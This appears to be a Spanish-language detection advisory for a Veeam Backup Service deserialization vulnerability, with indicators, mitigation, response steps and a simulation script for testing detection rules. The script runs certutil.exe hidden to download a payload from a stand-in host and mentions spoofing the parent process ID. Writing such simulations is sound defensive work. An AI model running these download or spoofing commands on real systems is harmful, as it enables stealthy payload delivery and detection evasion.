CVE-2026-44963: Indicadores de Explotación del Servicio de Copia de Seguridad de Veeam
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Este informe describe los indicadores de compromiso asociados con CVE-2026-44963, una vulnerabilidad en Veeam Backup Service que puede permitir la ejecución remota de código a través de deserialización insegura. Los atacantes pueden abusar del defecto para lanzar procesos secundarios sospechosos desde el servicio Veeam. La actividad resultante puede conducir a un acceso no autorizado y crear oportunidades para el movimiento lateral a través de la red.
Investigación
La investigación se centra en detectar procesos secundarios sospechosos generados por Veeam.Backup.Service.exe, incluyendo herramientas como cmd.exe or powershell.exe, e identificar actividad de red inusual en puertos relacionados con Veeam. Los analistas también deben estar atentos a eventos de inicio de sesión no autorizados y cambios inesperados de archivos dentro de los directorios de Veeam.
Mitigación
Para reducir el riesgo, los administradores deben actualizar Veeam Backup & Replication a una versión que aborde la deserialización insegura. Las políticas de firewall deben restringir estrictamente el acceso a los puertos de Veeam 9392-9419, y los defensores deben monitorizar la autenticación a estos servicios por parte de usuarios de dominio no administrativos. Las cuentas de servicio también deben ser restringidas según los principios de privilegio mínimo.
Respuesta
Si se detecta actividad sospechosa, el servidor Veeam afectado debe ser aislado de la red de inmediato. Los investigadores deben revisar los registros de ejecución de procesos, incluyendo el Identificador de Evento 4688 y la telemetría de Sysmon, junto con los registros de conexión de red para determinar el alcance del compromiso. La actividad reciente de las cuentas debe ser auditada y las credenciales deben restablecerse para cualquier cuenta involucrada durante la ventana de intrusión sospechosa.
Flujo de Ataque
Detecciones
Veeam Backup Service Generando Proceso Sospechoso (a través de línea de comandos)
Ver
Actividad de Proceso y Red Sospechosa desde Veeam Backup Service [Windows Sysmon]
Ver
Procesos Secundarios Sospechosos Generados por Veeam Backup Service [Creación de Procesos en Windows]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación Preliminar de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y buscar generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa de Ataque y Comandos: El adversario apunta a una vulnerabilidad en el Veeam Backup Service (simulada) para obtener privilegios de ejecución. Para mantener un perfil bajo mientras descarga una carga útil de segunda etapa, el atacante utiliza el proceso de Veeam secuestrado para generar
certutil.exe, un binario común de Living-off-the-Land, para buscar un archivo remoto. Esta acción está destinada a desencadenar lalógica de creación de procesosde la regla de detección. -
Script de Prueba de Regresión:
# INICIO DE SIMULACIÓN: Este script simula el servicio Veeam generando un proceso sospechoso. # Nota: Como no podemos 'convertirnos' fácilmente en el servicio Veeam sin derechos de admin/sistema, # simularemos la telemetría creando un proceso ficticio que imite la ruta de ParentImage. $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe" $TargetBinary = "certutil.exe" Write-Host "[+] Simulando proceso secundario sospechoso desde $VeeamPath" -ForegroundColor Cyan # En un entorno real, la vulnerabilidad haría que el servicio llame a esto. # Para validación, activamos el proceso. Para coincidir estrictamente con el # requisito de 'ParentImage' de la regla Sigma en un laboratorio, el evaluador debe # renombrar manualmente un proceso o usar una herramienta para falsificar el ID de Proceso Padre (PPID) si se prueba un EDR específico. Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden Write-Host "[+] Comando de simulación ejecutado." -ForegroundColor Green -
Comandos de Limpieza:
# Eliminar cualquier archivo temporal creado por la simulación Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue Stop-Process -Name "certutil" -ErrorAction SilentlyContinue